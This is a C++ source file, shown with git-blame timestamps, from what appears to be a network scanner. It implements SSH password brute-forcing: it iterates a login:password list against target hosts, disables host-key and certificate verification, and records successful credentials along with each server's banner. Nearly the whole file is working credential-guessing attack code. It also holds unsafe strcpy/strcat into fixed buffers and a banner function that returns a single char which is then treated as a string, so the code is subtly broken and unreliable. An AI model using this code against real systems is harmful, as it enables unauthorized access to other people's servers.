2015-03-23 13:54:40 +00:00
|
|
|
#include "SSHAuth.h"
|
2015-03-27 10:38:38 +00:00
|
|
|
#include "FileUpdater.h"
|
2015-03-23 13:54:40 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
|
|
|
|
|
|
|
|
CURL *curl = curl_easy_init();
|
|
|
|
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
|
2015-03-23 13:54:40 +00:00
|
|
|
char hostStr[128] = {0};
|
|
|
|
ZeroMemory(hostStr, sizeof(hostStr));
|
|
|
|
strcpy(hostStr, user);
|
|
|
|
strcat(hostStr, "@");
|
|
|
|
strcat(hostStr, host);
|
2015-03-27 13:38:53 +00:00
|
|
|
int sshTimeout = gTimeOut + 1;
|
2015-03-23 13:54:40 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
if (curl)
|
2015-03-23 13:54:40 +00:00
|
|
|
{
|
2015-03-27 13:38:53 +00:00
|
|
|
curl_easy_setopt(curl, CURLOPT_URL, host);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_PORT, port);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
|
|
|
|
int proxyPort = std::atoi(gProxyPort);
|
|
|
|
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
|
|
|
|
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
|
|
|
|
} else {
|
|
|
|
curl_easy_setopt(curl, CURLOPT_PROXY, "");
|
|
|
|
}
|
|
|
|
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
|
|
|
|
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
|
2015-03-23 13:54:40 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
int res = curl_easy_perform(curl);
|
2015-03-23 13:54:40 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
socket_t sock;
|
|
|
|
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
|
2015-03-23 13:54:40 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
if(res != CURLE_OK) {
|
|
|
|
curl_easy_cleanup(curl);
|
|
|
|
++ssh;
|
2015-03-28 09:27:59 +00:00
|
|
|
return -2;
|
2015-03-27 13:38:53 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
if(sock != -1) {
|
|
|
|
ssh_session ssh_session = ssh_new();
|
|
|
|
if (ssh_session == NULL)
|
|
|
|
{
|
|
|
|
ssh_free(ssh_session);
|
|
|
|
curl_easy_cleanup(curl);
|
|
|
|
return -1;
|
|
|
|
};
|
|
|
|
|
|
|
|
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
|
|
|
|
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
|
|
|
|
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
|
|
|
|
|
|
|
|
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
|
|
|
|
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
|
|
|
|
|
|
|
|
res = ssh_connect(ssh_session);
|
|
|
|
|
|
|
|
if (res != SSH_OK) //Offline
|
|
|
|
{
|
|
|
|
ssh_disconnect(ssh_session);
|
|
|
|
ssh_free(ssh_session);
|
|
|
|
curl_easy_cleanup(curl);
|
|
|
|
return -2;
|
|
|
|
}
|
|
|
|
else
|
|
|
|
{
|
|
|
|
res = ssh_userauth_password(ssh_session, NULL, pass);
|
|
|
|
if (res != SSH_AUTH_SUCCESS)
|
|
|
|
{
|
|
|
|
ssh_disconnect(ssh_session);
|
|
|
|
ssh_free(ssh_session);
|
|
|
|
curl_easy_cleanup(curl);
|
|
|
|
return -1;
|
|
|
|
};
|
|
|
|
};
|
|
|
|
|
|
|
|
ssh_disconnect(ssh_session);
|
|
|
|
ssh_free(ssh_session);
|
|
|
|
} else {
|
|
|
|
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
|
|
|
|
}
|
2015-03-23 13:54:40 +00:00
|
|
|
}
|
2015-03-27 13:38:53 +00:00
|
|
|
|
|
|
|
curl_easy_cleanup(curl);
|
2015-03-23 13:54:40 +00:00
|
|
|
++ssh;
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
char _get_ssh_banner(const char *ip, int port) {
|
2015-03-23 13:54:40 +00:00
|
|
|
char recvBuff[256] = {0};
|
|
|
|
std::string buffer;
|
|
|
|
Connector::nConnect(ip, port, &buffer);
|
|
|
|
|
|
|
|
int sz = buffer.size();
|
|
|
|
|
|
|
|
if(sz != 0)
|
|
|
|
{
|
|
|
|
strncpy(recvBuff, buffer.c_str(), sz < 256 ? sz : 256);
|
|
|
|
};
|
|
|
|
|
|
|
|
return *recvBuff;
|
|
|
|
}
|
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
int check_ssh_pass(const char *user, const char *pass,
|
|
|
|
const char *userPass, const char *host, int port,
|
|
|
|
std::string *buffer, const char *banner) {
|
2015-03-23 13:54:40 +00:00
|
|
|
int res = -1;
|
2015-03-27 13:38:53 +00:00
|
|
|
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
|
|
|
|
|
2015-03-23 13:54:40 +00:00
|
|
|
res = _sshConnect(user, pass, host, port);
|
2015-03-27 13:38:53 +00:00
|
|
|
|
2015-03-23 13:54:40 +00:00
|
|
|
if(res == 0)
|
|
|
|
{
|
2015-03-27 13:38:53 +00:00
|
|
|
stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
|
2015-03-23 13:54:40 +00:00
|
|
|
buffer->append(userPass);
|
|
|
|
buffer->append("@");
|
|
|
|
buffer->append(host);
|
|
|
|
buffer->append("|+|");
|
|
|
|
buffer->append(banner);
|
|
|
|
return 0;
|
|
|
|
};
|
2015-03-27 13:38:53 +00:00
|
|
|
|
2015-03-23 13:54:40 +00:00
|
|
|
return res;
|
|
|
|
}
|
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
|
2015-03-23 13:54:40 +00:00
|
|
|
char login[32] = {0};
|
|
|
|
char pass[32] = {0};
|
|
|
|
char temp[64] = {0};
|
|
|
|
char *ptr1 = 0;
|
|
|
|
int res = -1;
|
|
|
|
|
|
|
|
for(int i = 0; i < MaxSSHPass; ++i)
|
|
|
|
{
|
|
|
|
if(!globalScanFlag) break;
|
|
|
|
strcpy(temp, sshlpLst[i]);
|
|
|
|
ptr1 = strstr(temp, ":");
|
2015-03-27 10:38:38 +00:00
|
|
|
|
|
|
|
if (ptr1 == NULL) {
|
2015-03-27 13:38:53 +00:00
|
|
|
stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp));
|
|
|
|
return -1;
|
|
|
|
}
|
2015-03-27 10:38:38 +00:00
|
|
|
|
2015-03-27 13:38:53 +00:00
|
|
|
strncpy(login, temp, ptr1 - temp);
|
2015-03-23 13:54:40 +00:00
|
|
|
strcpy(pass, ptr1 + 1);
|
|
|
|
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
|
|
|
|
ZeroMemory(login, sizeof(login));
|
|
|
|
ZeroMemory(pass, sizeof(pass));
|
|
|
|
ZeroMemory(temp, sizeof(temp));
|
|
|
|
|
|
|
|
if(res == 0)
|
|
|
|
{
|
|
|
|
if(i == 0) return -2; //Failhit
|
|
|
|
return 1;
|
|
|
|
}
|
|
|
|
else if(res == -2)
|
|
|
|
{
|
|
|
|
return -2;
|
|
|
|
};
|
|
|
|
|
|
|
|
Sleep(500);
|
|
|
|
};
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
|
|
|
|
QString strIP;
|
|
|
|
QString strPort;
|
|
|
|
int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
|
|
|
|
{
|
2015-04-02 12:33:49 +00:00
|
|
|
if(gMaxBrutingThreads > 0) {
|
|
|
|
|
|
|
|
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
|
|
|
|
|
|
|
const char &banner = _get_ssh_banner(ip, port);
|
|
|
|
if(strlen(&banner) > 0)
|
|
|
|
{
|
2015-04-04 12:43:22 +00:00
|
|
|
//BruteUtils::BConInc();
|
|
|
|
++BrutingThrds;
|
|
|
|
int res = SSHBrute(ip, port, buffer, &banner);
|
|
|
|
--BrutingThrds;
|
|
|
|
//BruteUtils::BConDec();
|
2015-04-02 12:33:49 +00:00
|
|
|
return res;
|
|
|
|
};
|
|
|
|
return -1;
|
|
|
|
} else return -1;
|
2015-03-23 13:54:40 +00:00
|
|
|
}
|